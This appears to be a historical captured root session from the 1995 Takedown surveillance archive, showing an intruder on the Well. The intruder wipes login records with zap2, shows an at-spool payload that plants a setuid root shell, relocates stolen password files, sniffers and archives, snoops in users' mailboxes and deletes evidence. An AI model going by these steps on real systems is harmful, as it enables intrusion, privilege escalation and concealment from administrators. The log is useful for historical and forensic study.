Kevin On Demand
- Moving and Hiding - kevin-on-demand.takedown.com 4026
- Start: 1995 Feb 14 13:40:36
- Total Run Time: 15:36
- From NETCOM-atl7.netcom.net to netcom6.netcom.com.
- On the Well, cleaning up; panicked? Paranoid behavior, moving stuff from the dono account to others, like cybertek. Looking for additional places where he could have been logged; cleaning up.
well# zap2 dono
Zap2!
well# zap2 dono
Zap2!
well# zap2 dono
^C
well# last dono &
[1] 22275
working...
well# cd /home/c/y/cybertek
well# ls
(biod) c68hx.tar.Z inn neword.out.Z
(nfsd) c68ka.tar.Z inn.resu nfs.tar.gz
0108.gz cards.gz inter.arc nohup.out
0211.inm cloak itool ns.c
1022csn.tar.Z cloak.c kermit nw.tar.Z
4004 cust.out.Z key2.zip o.tar.Z
News eye.tar.gz kocher.tar.Z okitsu.tar.Z
a68hx.tar.Z f.c lile oldctek.tar.Z
aa foo.gz log1 oldnw.tar.Z
aliases.pag foosh log2 out.gz
asm11 fooshtool mail.tar passwd
athole.txt g.c marty.tar.gz.crypt passwdrace
btraq.tar.gz hc11 master.passwd portd.c
bug.sh ho.lck mbox pres
c.c ifj.c.gz.crypt mbox.Z pw-backup.23.tar.Z
c68ha.tar.Z in.telnetd mconnect.c satan.tar.Z
c68hs.tar.Z inm netshit sendmail.tar.Z
c68hv.tar.Z inmet newoki.tar.Z sgstuff.gz
well# more athole.txt
#include<sys/time.h>
#include<sys/wait.h>
#include<stdio.h>
#define ATSIZE 512
static char Atdir[] = "/usr/spool/at";
static char Atformat[] = "\
# owner: root\n\
# jobname: chkfpd\n\
# shell: sh\n\
# notify by mail: no\n\
\n\
exec 2>&-\n\
/bin/cp /bin/sh /tmp/-\n\
/bin/chmod 6711 /tmp/-\n\
exit 0\n\
\n";
static char *env[] = {
0
};
q
[1] + Done last dono
well# ls -tla nfs*
-rw-r--r-- 1 root other 341563 Feb 14 13:41 nfs.tar.gz
well# pwd
/home/c/y/cybertek
well# ls
(biod) eye.tar.gz master.passwd sniffer.c.gz
(nfsd) f.c mbox solsniff
0108.gz foo.gz mbox.Z solsniff.c
0211.inm foosh mconnect.c sportd
1022csn.tar.Z fooshtool netshit ss.c
4004 g.c newoki.tar.Z sss
News hc11 neword.out.Z sum
a68hx.tar.Z ho.lck nfs.tar.gz sunsniffer.c
aa ifj.c.gz.crypt nohup.out syscheck
aliases.pag in.telnetd ns.c tapelog.out.Z
asm11 inm nw.tar.Z tcpd.tar.Z
athole.txt inmet o.tar.Z tcpd.tar.gz.crypt
btraq.tar.gz inn okitsu.tar.Z time
bug.sh inn.resu oldctek.tar.Z unxor.c
c.c inter.arc oldnw.tar.Z vsr.gz.crypt
c68ha.tar.Z itool out.gz wietse
c68hs.tar.Z kermit passwd z
c68hv.tar.Z key2.zip passwdrace zap
c68hx.tar.Z kocher.tar.Z portd.c zap.c
c68ka.tar.Z lile pres zap2
cards.gz log1 pw-backup.23.tar.Z zap2.c
cloak log2 satan.tar.Z zipcrack.zip
cloak.c mail.tar sendmail.tar.Z zipcrypt.zip
cust.out.Z marty.tar.gz.crypt sgstuff.gz zipstuff.tar.Z
well# pwd
/home/c/y/cybertek
well# ls *.c
c.c g.c portd.c sunsniffer.c zap2.c
cloak.c mconnect.c solsniff.c unxor.c
f.c ns.c ss.c zap.c
well# ps -ef | grep cp
^C
well# ps -ef | grep cp &
[1] 23475 23476
well# pwd
/home/c/y/cybertek
well# find . -exec chown cybertek {} \; &
[2] 23633
well# ls -tla g.c
-rw-rw-rw- 1 root other 18680 Feb 14 13:40 g.c
well# ls -tla a*
-rw-r--r-- 1 cybertek other 1024 Feb 14 13:40 aliases.pag
-rw-r--r-- 1 cybertek other 1781771 Feb 14 13:40 aa
-rwxrwxrwx 1 cybertek other 314800 Feb 14 13:40 asm11
-rw-r--r-- 1 cybertek other 2914 Feb 14 13:40 athole.txt
-rw-r--r-- 1 cybertek other 1016017 Feb 14 13:40 a68hx.tar.Z
well#
root 23476 21921 9 13:43:44 pts/102 0:00 grep cp
nuucp 19803 1 23 13:35:00 ? 0:00 /usr/lib/sendmail -frfriess@Dialup.FranceNet.FR -oi delphi.com!bisseni
nuucp 19608 1 27 13:34:38 ? 0:00 /usr/lib/sendmail -frfriess@Dialup.FranceNet.FR -oi delphi.com!bisseni
well# pwd
/home/c/y/cybertek
well# du
6 ./.cfdir
2 ./News
61282 ./hc11
23026 ./itool
186798 .
well# cd
[1] Done ps -ef | grep cp
well# du
2 ./News
23026 ./itool
61282 ./hc11
187006 .
well# ls -tla | grep dr
drwxr-xr-x 5 dono well 2048 Feb 13 16:55 .
drwxr-sr-x 98 root sys 2048 Feb 13 11:59 ..
drwxrwxrwx 2 dono well 512 Feb 5 01:18 itool
drw-r--r-- 2 dono well 512 Jan 16 22:33 hc11
drw-r--r-- 2 dono well 512 Dec 31 12:21 News
-rw-r--r-- 1 dono well 4621 Dec 11 20:45 passwdrace
[2] + Done find . -exec chown cybertek {} ;
well# cd /home/c/y/cybertek
well# cat nohup*
well# ls -tla nohu*
-rw------- 1 cybertek other 0 Feb 14 13:40 nohup.out
well# rm nohup.out
well# du
6 ./.cfdir
2 ./News
61282 ./hc11
23026 ./itool
186798 .
well# pwd
/home/c/y/cybertek
well# nohup pcp -r $HOME/* . &
[1] 24856
pcp: Command not found
[1] Exit 1 pcp -r /home/d/o/dono/* .
well# nohup cp -r $HOME/* . &
[1] 24922
well# pwd
/home/c/y/cybertek
well# cd /home/j/l/jlittman
well# ls -tla
total 1526
-rw------- 1 jlittman well 312377 Feb 13 16:35 .inbox
drwxr-sr-x 33 root sys 512 Feb 10 10:43 ..
-rw------- 1 jlittman well 437255 Feb 6 13:05 mbox
drwxr-xr-x 2 jlittman well 512 Feb 5 20:27 .
-rw-r--r-- 1 jlittman well 0 Jan 26 18:02 .news_time
-rw------- 1 jlittman well 191 Oct 31 12:23 .bash_history
well# cd /home/j/o/johnm
well# ls -tla | head
total 644
drwxr-sr-x 156 root sys 3072 Feb 14 11:25 ..
-rw------- 1 johnm well 16 Feb 6 11:49 .forward
drwxr-xr-x 9 johnm well 1024 Feb 6 11:49 .
drwxr-xr-x 2 johnm well 512 Feb 6 11:43 News
-rw------- 1 johnm well 0 Feb 6 11:36 .inbox
-rw------- 1 johnm well 216848 Feb 6 11:36 mbox
-rw-r--r-- 1 johnm well 0 Jan 26 18:02 .news_time
drwxr-xr-x 2 johnm well 512 Jan 25 14:58 .nn
-rw------- 1 johnm well 12895 Jan 25 14:58 .newsrc
well# cd /var/log
well# ls
OLD cron license_log multi.log tac.log wtmproll
ascend.wtmp daemon mail popper wfile.err
auth finger multi.err syslog wfile.log
well# grep ftp /etc/inetd.conf
ftp stream tcp nowait root /usr/sbin/in.ftpd in.ftpd -l
# Tftp service is provided primarily for booting. Most sites run this
tftp dgram udp wait root /usr/sbin/in.tftpd in.tftpd -s /tftpboot
well# ls -tla
total 9598
-rw-r----- 1 root staff 4077131 Feb 14 13:48 mail
-rw-r--r-- 1 root staff 284767 Feb 14 13:48 popper
-rw-r--r-- 1 nobody other 75288 Feb 14 13:47 finger
-rw-r----- 1 root staff 230799 Feb 14 13:47 daemon
-rw-r----- 1 root staff 4470 Feb 14 13:47 auth
-rw-r--r-- 1 root other 28272 Feb 14 13:43 tac.log
-rw-r--r-- 1 root other 7812 Feb 14 13:27 ascend.wtmp
drwxr-xr-x 22 root sys 512 Feb 14 13:00 ..
-rw-rw-rw- 1 root root 117218 Feb 14 12:43 license_log
-rw-r--r-- 1 root well 23986 Feb 14 11:50 wfile.log
drwxr-sr-x 5 root root 512 Feb 14 00:06 wtmproll
drwxr-xr-x 2 root staff 2048 Feb 14 00:04 OLD
drwxr-x--x 4 root staff 512 Feb 14 00:04 .
-rw-rw---- 1 root lundeen 4366 Jan 26 13:52 wfile.err
-rw-r--r-- 1 root root 127 Jan 9 15:54 multi.log
-rw------- 1 root root 134 Dec 29 14:23 multi.err
-rw-r--r-- 1 root other 0 Feb 27 1994 cron
-rw-r----- 1 root staff 0 Sep 27 1993 syslog
well# grep -i dono * &
[2] 25589
[1] Done cp -r /home/d/o/dono/* .
finger:Feb 13 02:09:48 gaia.internex.net: dono
license_log:11/26 13:25:37 (suntechd) DENIED: sunpro.c v3.000 by dono@anyhost(/dev/tty)
license_log:11/26 19:05:26 (suntechd) DENIED: sunpro.c v3.000 by dono@anyhost(/dev/tty)
license_log: 2/05 19:41:32 (suntechd) DENIED: sunpro.c v3.000 by dono@anyhost(/dev/tty)
license_log: 2/05 19:41:57 (suntechd) DENIED: sunpro.c v3.000 by dono@anyhost(/dev/tty)
mail:Feb 14 10:20:59 well sendmail[24926]: KAA24926: from=<donosy-l@fuw.edu.pl>,
size=5379, class=-60, pri=143379, nrcpts=1, msgid=<9502141642.AA07689@albert2>,
proto=ESMTP, relay=sunic.sunet.se [192.36.125.2]
well# cd /home/c/y/cybertek
[2] Done grep -i dono *
well# find . -exec chown cybertek {} \; &
[1] 25805
well# rm nohup*
No match
well# pwd
/home/c/y/cybertek
well# cd
well# ls
(biod) eye.tar.gz master.passwd solsniff
(nfsd) f.c mbox solsniff.c
0108.gz foo.gz mbox.Z sportd
0211.inm foosh mconnect.c ss.c
1022csn.tar.Z fooshtool netshit sss
4004 g.c newoki.tar.Z sum
News hc11 neword.out.Z sunsniffer.c
a68hx.tar.Z ho.lck nfs.tar.gz syscheck
aa ifj.c.gz.crypt ns.c tapelog.out.Z
aliases.pag in.telnetd nw.tar.Z tcpd.tar.Z
asm11 inm o.tar.Z tcpd.tar.gz.crypt
athole.txt inmet okitsu.tar.Z time
btraq.tar.gz inn oldctek.tar.Z unxor.c
bug.sh inn.resu oldnw.tar.Z vsr.gz.crypt
c.c inter.arc out.gz wietse
c68ha.tar.Z itool passwd z
c68hs.tar.Z kermit passwdrace zap
c68hv.tar.Z key2.zip portd.c zap.c
c68hx.tar.Z kocher.tar.Z pres zap2
c68ka.tar.Z lile pw-backup.23.tar.Z zap2.c
cards.gz log1 satan.tar.Z zipcrack.zip
cloak log2 sendmail.tar.Z zipcrypt.zip
cloak.c mail.tar sgstuff.gz zipstuff.tar.Z
cust.out.Z marty.tar.gz.crypt sniffer.c.gz
well# rm -i *
rm: remove (biod) (y/n)? y
rm: remove (nfsd) (y/n)? y
rm: remove 0108.gz (y/n)? n
rm: remove 0211.inm (y/n)? n
rm: remove 1022csn.tar.Z (y/n)? y
rm: remove 4004 (y/n)? n
rm: News is a directory
rm: remove a68hx.tar.Z (y/n)? y
rm: remove aa (y/n)? y
rm: remove aliases.pag (y/n)? y
rm: remove asm11 (y/n)? n
rm: remove athole.txt (y/n)? y
rm: remove btraq.tar.gz (y/n)? y
rm: remove bug.sh (y/n)? y
rm: remove c.c (y/n)? y
rm: remove c68ha.tar.Z (y/n)? n
rm: remove c68hs.tar.Z (y/n)? n
rm: remove c68hv.tar.Z (y/n)? n
rm: remove c68hx.tar.Z (y/n)? n
rm: remove c68ka.tar.Z (y/n)? n
rm: remove cards.gz (y/n)? y
rm: remove cloak (y/n)? n
rm: remove cloak.c (y/n)? n
rm: remove cust.out.Z (y/n)? n
rm: remove eye.tar.gz y
rm: remove f.c (y/n)? y
rm: remove foo.gz (y/n)? y
rm: remove foosh (y/n)? y
rm: remove fooshtool (y/n)? y
rm: remove g.c (y/n)? n
rm: hc11 is a directory
rm: remove ho.lck (y/n)? y
rm: remove ifj.c.gz.crypt (y/n)? y
rm: remove in.telnetd (y/n)? y
rm: remove inm (y/n)? y
rm: remove inmet (y/n)? y
rm: remove inn (y/n)? y
rm: remove inn.resu (y/n)? y
rm: remove inter.arc (y/n)? y
rm: itool is a directory
rm: remove kermit (y/n)? y
rm: remove key2.zip (y/n)? n
rm: remove kocher.tar.Z (y/n)? n
rm: remove lile (y/n)? y
rm: remove log1 (y/n)? n
rm: remove log2 (y/n)? n
rm: remove mail.tar (y/n)? y
rm: remove marty.tar.gz.crypt (y/n)? y
rm: remove master.passwd (y/n)? y
rm: remove mbox (y/n)? y
rm: remove mbox.Z (y/n)? y
rm: remove mconnect.c (y/n)? n
rm: remove netshit (y/n)? y
rm: remove newoki.tar.Z (y/n)? n
rm: remove neword.out.Z (y/n)? y
rm: remove nfs.tar.gz (y/n)? y
rm: remove ns.c (y/n)? n
rm: remove nw.tar.Z (y/n)? n
rm: remove o.tar.Z (y/n)? n
rm: remove okitsu.tar.Z (y/n)? n
rm: remove oldctek.tar.Z (y/n)? n
rm: remove oldnw.tar.Z (y/n)? n
rm: remove out.gz (y/n)? y
rm: remove passwd (y/n)? y
rm: remove passwdrace (y/n)? y
rm: remove portd.c (y/n)? n
rm: remove pres (y/n)? y
rm: remove pw-backup.23.tar.Z (y/n)? y
rm: remove satan.tar.Z (y/n)? n
rm: remove sendmail.tar.Z (y/n)? n
rm: remove sgstuff.gz (y/n)? y
rm: remove sniffer.c.gz (y/n)? y
rm: remove solsniff (y/n)? y
rm: remove solsniff.c (y/n)? y
rm: remove sportd (y/n)? n
rm: remove ss.c (y/n)? y
rm: remove sss (y/n)? y
rm: remove sum (y/n)? n
rm: remove sunsniffer.c (y/n)? y
rm: remove syscheck (y/n)? y
rm: remove tapelog.out.Z (y/n)? y
rm: remove tcpd.tar.Z (y/n)? y
rm: remove tcpd.tar.gz.crypt y
rm: remove time (y/n)? n
rm: remove unxor.c (y/n)? n
rm: remove vsr.gz.crypt (y/n)? y
rm: remove wietse (y/n)? y
rm: remove z (y/n)? y
rm: remove zap (y/n)? n
rm: remove zap.c (y/n)? n
rm: remove zap2 (y/n)? n
rm: remove zap2.c (y/n)? n
rm: remove zipcrack.zip (y/n)? n
rm: remove zipcrypt.zip (y/n)? n
rm: remove zipstuff.tar.Z (y/n)? n
[1] + Done find . -exec chown cybertek {} ;
well# ls
0108.gz c68ka.tar.Z log1 oldnw.tar.Z zap.c
0211.inm cloak log2 portd.c zap2
4004 cloak.c mconnect.c satan.tar.Z zap2.c
News cust.out.Z newoki.tar.Z sendmail.tar.Z zipcrack.zip
asm11 g.c ns.c sportd zipcrypt.zip
c68ha.tar.Z hc11 nw.tar.Z sum zipstuff.tar.Z
c68hs.tar.Z itool o.tar.Z time
c68hv.tar.Z key2.zip okitsu.tar.Z unxor.c
c68hx.tar.Z kocher.tar.Z oldctek.tar.Z zap
well# ls -tla asm11
-rwxrwxrwx 1 dono well 314800 Feb 7 22:45 asm11
well# rm portd.c
well# ls -tla | grep dr
drwxr-xr-x 5 dono well 2048 Feb 14 13:54 .
drwxr-sr-x 98 root sys 2048 Feb 13 11:59 ..
drwxrwxrwx 2 dono well 512 Feb 5 01:18 itool
drw-r--r-- 2 dono well 512 Jan 16 22:33 hc11
drw-r--r-- 2 dono well 512 Dec 31 12:21 News
well# rm 0211*
well# ls hc11 itool
hc11:
c682f.tar.Z hc16.tar.Z lmgr.tar.Z wsl3.tar.Z
c682x.tar.Z license.tar.Z wsl.tar.Z zhc11.taz
hc11new.tar.Z licstuff.tar.Z wsl2.tar.Z
itool:
c68hv.tar.Z hc11f.tar.Z mikem.tar.Z
cosmic.tar.Z hc11new.tar.Z wsl.tar.Z
well# rm -rf News
well# cd
well# du
23026 ./itool
61282 ./hc11
156464 .
well# ls
0108.gz cloak log1 oldctek.tar.Z zap
4004 cloak.c log2 oldnw.tar.Z zap.c
asm11 cust.out.Z mconnect.c satan.tar.Z zap2
c68ha.tar.Z g.c newoki.tar.Z sendmail.tar.Z zap2.c
c68hs.tar.Z hc11 ns.c sportd zipcrack.zip
c68hv.tar.Z itool nw.tar.Z sum zipcrypt.zip
c68hx.tar.Z key2.zip o.tar.Z time zipstuff.tar.Z
c68ka.tar.Z kocher.tar.Z okitsu.tar.Z unxor.c
well# ls hc11
c682f.tar.Z hc16.tar.Z lmgr.tar.Z wsl3.tar.Z
c682x.tar.Z license.tar.Z wsl.tar.Z zhc11.taz
hc11new.tar.Z licstuff.tar.Z wsl2.tar.Z
well# mv c68* hc11
well#